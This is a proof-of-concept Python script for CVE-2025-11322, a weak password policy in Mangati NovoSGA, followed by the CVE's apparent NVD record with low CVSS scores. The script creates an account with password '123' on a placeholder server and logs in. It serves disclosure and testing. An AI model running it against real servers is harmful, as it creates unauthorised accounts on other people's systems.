CVE-2025-11322

# CVE-2025-11322 - Mangati NovoSGA Weak Password Policy PoC # Vulnerability: Weak password requirements in user creation page # Affected: Mangati NovoSGA <= 2.2.12 # Endpoint: /novosga.users/new import requests TARGET_URL = "http://target-novosga-server" CREATE_USER_ENDPOINT = "/novosga.users/new" # Step 1: Get the user creation page to retrieve CSRF token (if any) session = requests.Session() response = session.get(f"{TARGET_URL}{CREATE_USER_ENDPOINT}") # Step 2: Prepare the payload with a weak password # The vulnerability allows passwords like "123", "abc", or single characters weak_password_payload = { "username": "test_user_weak", "email": "[email protected]", "senha": "123", # Weak password - only 3 digits "confirmacao_senha": "123", # Password confirmation "nome": "Test", "sobrenome": "User", "perfil": "USER", "status": 1 } # Step 3: Submit the user creation request with weak password response = session.post( f"{TARGET_URL}{CREATE_USER_ENDPOINT}", data=weak_password_payload, headers={ "Content-Type": "application/x-www-form-urlencoded", "Referer": f"{TARGET_URL}{CREATE_USER_ENDPOINT}" } ) # Step 4: Verify the account was created with weak password if response.status_code == 200 or response.status_code == 302: print("[+] User created successfully with weak password '123'") # Step 5: Attempt login with the weak password login_endpoint = "/novosga.login" login_payload = { "username": "test_user_weak", "password": "123" } login_response = session.post( f"{TARGET_URL}{login_endpoint}", data=login_payload ) if "dashboard" in login_response.url or login_response.status_code == 302: print("[+] Successfully logged in with weak password!") print("[+] Vulnerability CVE-2025-11322 confirmed") else: print(f"[-] Request failed with status code: {response.status_code}") # Additional weak passwords to test: # "a" (single character) # "password" (common dictionary word) # "123456" (sequential numbers) # "qwerty" (keyboard pattern)

{"cve": {"id": "CVE-2025-11322", "sourceIdentifier": "[email protected]", "published": "2025-10-06T06:15:35.203", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Mangati NovoSGA up to 2.2.12. The impacted element is an unknown function of the file /novosga.users/new of the component User Creation Page. Executing manipulation of the argument Senha/Confirmação da senha can lead to weak password requirements. The attack can be launched remotely. Attacks of this nature are highly complex. The exploitability is regarded as difficult. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-521"}]}], "references": [{"url": "https://github.com/marcelomulder/CVE/blob/main/NovoSga/CVE-2025-11322.md", "source": "[email protected]"}, {"url": "https://github.com/marcelomulder/CVE/blob/main/NovoSga/Weak%20Password%20Policy%20in%20Novosga.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.327203", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.327203", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.664517", "source": "[email protected]"}]}}